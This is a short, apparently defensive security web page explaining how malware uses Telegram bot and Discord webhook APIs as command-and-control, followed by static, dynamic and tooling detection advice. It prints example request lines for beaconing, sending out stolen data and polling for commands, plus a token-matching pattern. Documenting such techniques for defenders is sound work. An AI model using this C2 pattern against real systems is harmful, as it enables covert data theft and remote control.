Skip to content

Messaging App C2

Using a legitimate messaging platform's bot or webhook API as the command-and-control channel, so traffic blends into normal traffic to a popular, rarely-blocked cloud service.

Standing up and maintaining dedicated C2 infrastructure is expensive and gives defenders a domain/IP to block. An easier alternative is to route commands and exfiltrated data through a platform that is already trusted, already encrypted in transit, and already allowed through most corporate egress policies: a chat app's own bot or webhook API.

How it works

A malware operator creates a bot (Telegram) or webhook (Discord) ahead of time and embeds its token in the sample. From there, the malware's "C2 protocol" is just that platform's ordinary API:

text
POST https://api.telegram.org/bot<token>/sendMessage   ; exfil / beacon
GET  https://api.telegram.org/bot<token>/getUpdates    ; poll for commands

Results (screenshots, credentials, keystrokes) are sent the same way, often as file uploads via the platform's own media-upload endpoint. Because the destination is api.telegram.org or discord.com — domains an enormous number of legitimate users and even legitimate corporate integrations talk to — network defenses that allowlist popular SaaS domains rather than inspecting content will simply never flag it, and no attacker-controlled domain ever needs to be registered or protected from takedown.

Detection & analysis

  • Static — A hard-coded bot token (Telegram tokens have a recognisable \d+:[A-Za-z0-9_-]{35} shape) or webhook URL in a sample's strings is an extremely reliable static indicator, since legitimate software rarely embeds a fixed, single-purpose bot credential.
  • Dynamic — The traffic itself is TLS to a legitimate, widely-used domain, so payload inspection is a dead end; the signal is instead process-to-destination mismatch — a process with no plausible reason to talk to api.telegram.org/discord.com (e.g. not a browser, not a known chat client) doing so repeatedly on a beacon-like interval.
  • Policy discussion — This technique is a direct argument for application-aware egress control rather than domain allowlisting alone: if a security stack trusts any traffic to a popular SaaS domain by default, this class of C2 is close to invisible to it.
  • Tools — TLS SNI/JA3 fingerprinting to flag non-browser clients talking to messaging-platform domains, EDR process-network correlation, YARA/string scanning for bot-token patterns during static triage.
Votes

Comments(0)